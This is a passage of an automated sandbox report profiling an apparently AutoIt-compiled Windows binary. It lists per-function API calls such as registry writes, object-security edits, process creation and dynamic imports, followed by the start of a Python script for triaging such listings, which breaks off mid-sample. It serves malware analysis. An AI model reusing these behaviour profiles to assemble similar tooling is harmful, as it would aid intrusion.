                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                      • String ID:
                                                                      • API String ID: 1996641542-0
                                                                      • Opcode ID: 61fd5ebe5afb4d788003a89527a5e15251b83f870c67544fe6ec8044d3603fe0
                                                                      • Instruction ID: d35e5c2ff13cb40909102dd618a18de5befe2a87a5f567be92ffd9d92905e41d
                                                                      • Opcode Fuzzy Hash: 61fd5ebe5afb4d788003a89527a5e15251b83f870c67544fe6ec8044d3603fe0
                                                                      • Instruction Fuzzy Hash: E1615D72910218AFDF119FA4DC89BEE7FB9EB08320F114215F915BB2A1D775A940DF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetCursorPos.USER32(?), ref: 00C31128
                                                                      • GetDesktopWindow.USER32 ref: 00C3113D
                                                                      • GetWindowRect.USER32(00000000), ref: 00C31144
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00C31199
                                                                      • DestroyWindow.USER32 ref: 00C311B9
                                                                      • CreateWindowExW.USER32 ref: 00C311ED
                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C3120B
                                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00C3121D
                                                                      • SendMessageW.USER32(00000000,00000421,?,?), ref: 00C31232
                                                                      • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00C31245
                                                                      • IsWindowVisible.USER32(00000000), ref: 00C312A1
                                                                      • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00C312BC
                                                                      • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00C312D0
                                                                      • GetWindowRect.USER32(00000000,?), ref: 00C312E8
                                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00C3130E
                                                                      • GetMonitorInfoW.USER32(00000000,?), ref: 00C31328
                                                                      • CopyRect.USER32(?,?), ref: 00C3133F
                                                                      • SendMessageW.USER32(00000000,00000412,00000000), ref: 00C313AA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                      • String ID: ($0$tooltips_class32
                                                                      • API String ID: 698492251-4156429822
                                                                      • Opcode ID: 476dcd323971419671ecc3b50e9e341793ffe8ce06cc54779d8ecc9dd49dfdb3
                                                                      • Instruction ID: e6d9c4972b366d5adbedbbb57fc469153d87fe817718b4ec65444a05bf1f6cda
                                                                      • Opcode Fuzzy Hash: 476dcd323971419671ecc3b50e9e341793ffe8ce06cc54779d8ecc9dd49dfdb3
                                                                      • Instruction Fuzzy Hash: ACB19B71618341AFD704DF64C885BAEBBE4FF85310F04891CF999AB2A1CB31E944CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CharUpperBuffW.USER32(?,?), ref: 00C302E5
                                                                      • _wcslen.LIBCMT ref: 00C3031F
                                                                      • _wcslen.LIBCMT ref: 00C30389
                                                                      • _wcslen.LIBCMT ref: 00C303F1
                                                                      • _wcslen.LIBCMT ref: 00C30475
                                                                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00C304C5
                                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C30504
                                                                        • Part of subcall function 00BBF9F2: _wcslen.LIBCMT ref: 00BBF9FD
                                                                        • Part of subcall function 00C0223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C02258
                                                                        • Part of subcall function 00C0223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C0228A
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                      • API String ID: 1103490817-719923060
                                                                      Uniqueness Score: -1.00%
                                                                      APIs
                                                                      • SystemParametersInfoW.USER32 ref: 00BB8968
                                                                      • GetSystemMetrics.USER32 ref: 00BB8970
                                                                      • SystemParametersInfoW.USER32 ref: 00BB899B
                                                                      • GetSystemMetrics.USER32 ref: 00BB89A3
                                                                      • GetSystemMetrics.USER32 ref: 00BB89C8
                                                                      • SetRect.USER32 ref: 00BB89E5
                                                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00BB89F5
                                                                      • CreateWindowExW.USER32 ref: 00BB8A28
                                                                      • SetWindowLongW.USER32 ref: 00BB8A3C
                                                                      • GetClientRect.USER32 ref: 00BB8A5A
                                                                      • GetStockObject.GDI32(00000011), ref: 00BB8A76
                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00BB8A81
                                                                        • Part of subcall function 00BB912D: GetCursorPos.USER32(?), ref: 00BB9141
                                                                        • Part of subcall function 00BB912D: ScreenToClient.USER32(00000000,?), ref: 00BB915E
                                                                        • Part of subcall function 00BB912D: GetAsyncKeyState.USER32 ref: 00BB9183
                                                                        • Part of subcall function 00BB912D: GetAsyncKeyState.USER32 ref: 00BB919D
                                                                      • SetTimer.USER32(00000000,00000000,00000028,00BB90FC), ref: 00BB8AA8
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                      • String ID: AutoIt v3 GUI
                                                                      • API String ID: 1458621304-248962490
                                                                      Uniqueness Score: -1.00%
                                                                      APIs
                                                                        • Part of subcall function 00C010F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C01114
                                                                        • Part of subcall function 00C010F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00C00B9B,?,?,?), ref: 00C01120
                                                                        • Part of subcall function 00C010F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C00B9B,?,?,?), ref: 00C0112F
                                                                        • Part of subcall function 00C010F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C00B9B,?,?,?), ref: 00C01136
                                                                        • Part of subcall function 00C010F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C0114D
                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C00DF5
                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C00E29
                                                                      • GetLengthSid.ADVAPI32(?), ref: 00C00E40
                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00C00E7A
                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C00E96
                                                                      • GetLengthSid.ADVAPI32(?), ref: 00C00EAD
                                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00C00EB5
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00C00EBC
                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C00EDD
                                                                      • CopySid.ADVAPI32(00000000), ref: 00C00EE4
                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C00F13
                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C00F35
                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C00F47
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C00F6E
                                                                      • HeapFree.KERNEL32(00000000), ref: 00C00F75
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C00F7E
                                                                      • HeapFree.KERNEL32(00000000), ref: 00C00F85
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C00F8E
                                                                      • HeapFree.KERNEL32(00000000), ref: 00C00F95
                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00C00FA1
                                                                      • HeapFree.KERNEL32(00000000), ref: 00C00FA8
                                                                        • Part of subcall function 00C01193: GetProcessHeap.KERNEL32(00000008,00C00BB1,?,00000000,?,00C00BB1,?), ref: 00C011A1
                                                                        • Part of subcall function 00C01193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00C00BB1,?), ref: 00C011A8
                                                                        • Part of subcall function 00C01193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00C00BB1,?), ref: 00C011B7
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                      • String ID:
                                                                      • API String ID: 4175595110-0
                                                                      Uniqueness Score: -1.00%
                                                                      APIs
                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C2C4BD
                                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,00C3CC08,00000000,?,00000000,?,?), ref: 00C2C544
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00C2C5A4
                                                                      • _wcslen.LIBCMT ref: 00C2C5F4
                                                                      • _wcslen.LIBCMT ref: 00C2C66F
                                                                      • RegSetValueExW.ADVAPI32 ref: 00C2C6B2
                                                                      • RegSetValueExW.ADVAPI32 ref: 00C2C7C1
                                                                      • RegSetValueExW.ADVAPI32 ref: 00C2C84D
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00C2C881
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00C2C88E
                                                                      • RegSetValueExW.ADVAPI32 ref: 00C2C960
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                      • API String ID: 9721498-966354055
                                                                      Uniqueness Score: -1.00%
                                                                      APIs
                                                                      • CharUpperBuffW.USER32(?,?), ref: 00C309C6
                                                                      • _wcslen.LIBCMT ref: 00C30A01
                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C30A54
                                                                      • _wcslen.LIBCMT ref: 00C30A8A
                                                                      • _wcslen.LIBCMT ref: 00C30B06
                                                                      • _wcslen.LIBCMT ref: 00C30B81
                                                                        • Part of subcall function 00BBF9F2: _wcslen.LIBCMT ref: 00BBF9FD
                                                                        • Part of subcall function 00C02BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C02BFA
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                      • API String ID: 1103490817-4258414348
                                                                      Uniqueness Score: -1.00%
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: _wcslen$BuffCharUpper
                                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                      • API String ID: 1256254125-909552448
                                                                      Uniqueness Score: -1.00%
                                                                      APIs
                                                                      • _wcslen.LIBCMT ref: 00C3835A
                                                                      • _wcslen.LIBCMT ref: 00C3836E
                                                                      • _wcslen.LIBCMT ref: 00C38391
                                                                      • _wcslen.LIBCMT ref: 00C383B4
                                                                      • LoadImageW.USER32 ref: 00C383F2
                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00C35BF2), ref: 00C3844E
                                                                      • LoadImageW.USER32 ref: 00C38487
                                                                      • LoadImageW.USER32 ref: 00C384CA
                                                                      • LoadImageW.USER32 ref: 00C38501
                                                                      • FreeLibrary.KERNEL32(?), ref: 00C3850D
                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00C3851D
                                                                      • DestroyIcon.USER32(?,?,?,?,?,00C35BF2), ref: 00C3852C
                                                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00C38549
                                                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00C38555
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                      • String ID: .dll$.exe$.icl
                                                                      • API String ID: 799131459-1154884017
                                                                      Uniqueness Score: -1.00%
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                      • API String ID: 0-1645009161
                                                                      • Opcode ID: f555da7950af4cae931ce410ae7cfd663e734e2e45bff70831af2ed00f475a77
                                                                      • Instruction ID: 2805e287fdf04938fd2144047bff4de9e001ad9038c152a334958bbe031baf60
                                                                      • Opcode Fuzzy Hash: f555da7950af4cae931ce410ae7cfd663e734e2e45bff70831af2ed00f475a77
                                                                      • Instruction Fuzzy Hash: 9381C671A58605BBDB20AF61DC82FBE37E8EF16300F0440A5F905AA192EF70DE11D7A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00BC00C6
                                                                        • Part of subcall function 00BC00ED: InitializeCriticalSectionAndSpinCount.KERNEL32( =,00000FA0,2E147FDC,?,?,?,?,00BE23B3,000000FF), ref: 00BC011C
                                                                        • Part of subcall function 00BC00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00BE23B3,000000FF), ref: 00BC0127
                                                                        • Part of subcall function 00BC00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00BE23B3,000000FF), ref: 00BC0138
                                                                        • Part of subcall function 00BC00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable,?,?,?,?,00BE23B3,000000FF), ref: 00BC014E
                                                                        • Part of subcall function 00BC00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS,?,?,?,?,00BE23B3,000000FF), ref: 00BC015C
                                                                        • Part of subcall function 00BC00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable,?,?,?,?,00BE23B3,000000FF), ref: 00BC016A
                                                                        • Part of subcall function 00BC00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00BC0195
                                                                        • Part of subcall function 00BC00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00BC01A0
                                                                      • ___scrt_fastfail.LIBCMT ref: 00BC00E7
                                                                        • Part of subcall function 00BC00A3: __onexit.LIBCMT ref: 00BC00A9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                      • String ID: =$InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                      • API String ID: 66158676-2336770138
                                                                      • Opcode ID: 8289751aa575cb93679fd19d55f7cfdb1f71970195cc3767b28e608bf5e72035
                                                                      • Instruction ID: 078f16327c306fc38f25063f32f91889545f026190e70dfff4a8e25df0195acb
                                                                      • Opcode Fuzzy Hash: 8289751aa575cb93679fd19d55f7cfdb1f71970195cc3767b28e608bf5e72035
                                                                      • Instruction Fuzzy Hash: 7321A132A64711EBE7116BA4AC4AF7EB3E4EB05B61F14457DF805B22A1DBB49C009B90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LoadIconW.USER32 ref: 00C05A2E
                                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00C05A40
                                                                      • SetWindowTextW.USER32 ref: 00C05A57
                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00C05A6C
                                                                      • SetWindowTextW.USER32 ref: 00C05A72
                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00C05A82
                                                                      • SetWindowTextW.USER32 ref: 00C05A88
                                                                      • SendDlgItemMessageW.USER32 ref: 00C05AA9
                                                                      • SendDlgItemMessageW.USER32 ref: 00C05AC3
                                                                      • GetWindowRect.USER32(?,?), ref: 00C05ACC
                                                                      • _wcslen.LIBCMT ref: 00C05B33
                                                                      • SetWindowTextW.USER32 ref: 00C05B6F
                                                                      • GetDesktopWindow.USER32 ref: 00C05B75
                                                                      • GetWindowRect.USER32(00000000), ref: 00C05B7C
                                                                      • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00C05BD3
                                                                      • GetClientRect.USER32 ref: 00C05BE0
                                                                      • PostMessageW.USER32 ref: 00C05C05
                                                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00C05C2F
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                      • String ID:
                                                                      • API String ID: 895679908-0
                                                                      • Opcode ID: 87234de1aedc3e52df1c688288e017486de760ab6dc99006af9358d6204935c5
                                                                      • Instruction ID: 22487894bf3272f3d08bf58a37f36066a0a69083b17a66c0c77b9e7c07cb6817
                                                                      • Opcode Fuzzy Hash: 87234de1aedc3e52df1c688288e017486de760ab6dc99006af9358d6204935c5
                                                                      • Instruction Fuzzy Hash: 72713A31A00B09AFDB20DFA9CE86BAFBBF5FF48704F104518E556A25A0D775AA44CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen
                                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                      • API String ID: 176396367-1603158881
                                                                      • Opcode ID: d0de0ffb0cbafa89d54305b8b151b1311e34c73fb4ce45a86e869b2c480a833b
                                                                      • Instruction ID: 7437df278c1d476c453296e9fca6745ebed2e662c1f650c28996565447c6ba53
                                                                      • Opcode Fuzzy Hash: d0de0ffb0cbafa89d54305b8b151b1311e34c73fb4ce45a86e869b2c480a833b
                                                                      • Instruction Fuzzy Hash: 35E1D731A00566ABCF249FA4C891BEDBBB8BF54710F648169E466B72D0DB30AF45C790
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$BuffCharDriveLowerType
                                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                      • API String ID: 2055661098-1000479233
                                                                      • Opcode ID: 0cb67a1790e02684abfb5a829f695a1436afde423ad9b8534b640b8626155702
                                                                      • Instruction ID: 86ae4e705645a4700cf6cc3a452d3499ad294ea956a759fd78b421093dd27b6a
                                                                      • Opcode Fuzzy Hash: 0cb67a1790e02684abfb5a829f695a1436afde423ad9b8534b640b8626155702
                                                                      • Instruction Fuzzy Hash: 7AB1E3716083029FC718DF28C890AAEB7E5AFA7764F50491DF4A6C7291D730DA84DB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • _wcslen.LIBCMT ref: 00C2B198
                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C2B1B0
                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C2B1D4
                                                                      • _wcslen.LIBCMT ref: 00C2B200
                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C2B214
                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C2B236
                                                                      • _wcslen.LIBCMT ref: 00C2B332
                                                                        • Part of subcall function 00C105A7: GetStdHandle.KERNEL32(000000F6), ref: 00C105C6
                                                                      • _wcslen.LIBCMT ref: 00C2B34B
                                                                      • _wcslen.LIBCMT ref: 00C2B366
                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C2B3B6
                                                                      • GetLastError.KERNEL32(00000000), ref: 00C2B407
                                                                      • CloseHandle.KERNEL32(?), ref: 00C2B439
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00C2B44A
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00C2B45C
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00C2B46E
                                                                      • CloseHandle.KERNEL32(?), ref: 00C2B4E3
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 2178637699-0
                                                                      • Opcode ID: a885bb8bb293191f4cabbbd96a89e755e7dd7d22a6ca4c0205f10f0438c41a00
                                                                      • Instruction ID: c38bfcd62e1858ffa6c49f6607251937f2b22ecb3598d53c8d08e97351ce09b1
                                                                      • Opcode Fuzzy Hash: a885bb8bb293191f4cabbbd96a89e755e7dd7d22a6ca4c0205f10f0438c41a00
                                                                      • Instruction Fuzzy Hash: 2CF1AD71608310DFC714EF24D891B6EBBE1AF85310F18859DF8A99B2A2DB71ED44CB52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

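The function listings in this section all share one shape: an "APIs" list of call sites with their module and address, a "Memory Dump Source" line giving the dump and its load base, and a "Similarity" block with the API/String IDs. When a report runs to thousands of these blocks it is faster to parse them than to read them. The following is an added example, not Joe Sandbox code and not code from the analysed sample: it parses that listing format, orders each function's direct calls by call-site address, converts the lowest address to an offset from the dump base (an RVA-style offset, since the dump is marked "based on PE: true"), and tags functions that create processes or resolve imports at run time. SAMPLE is a constructed excerpt copying two of the functions above; the tag names and the triage sets are my own choice.

```python
"""Parse Joe Sandbox per-function listings and triage them.

Added example; not part of Joe Sandbox or of the analysed sample. SAMPLE is a
constructed excerpt that copies the shape (and two functions) of the report
text above. The triage tags are my own, not Joe Sandbox signature names."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

SAMPLE = """\
APIs
• _wcslen.LIBCMT ref: 00C2B198
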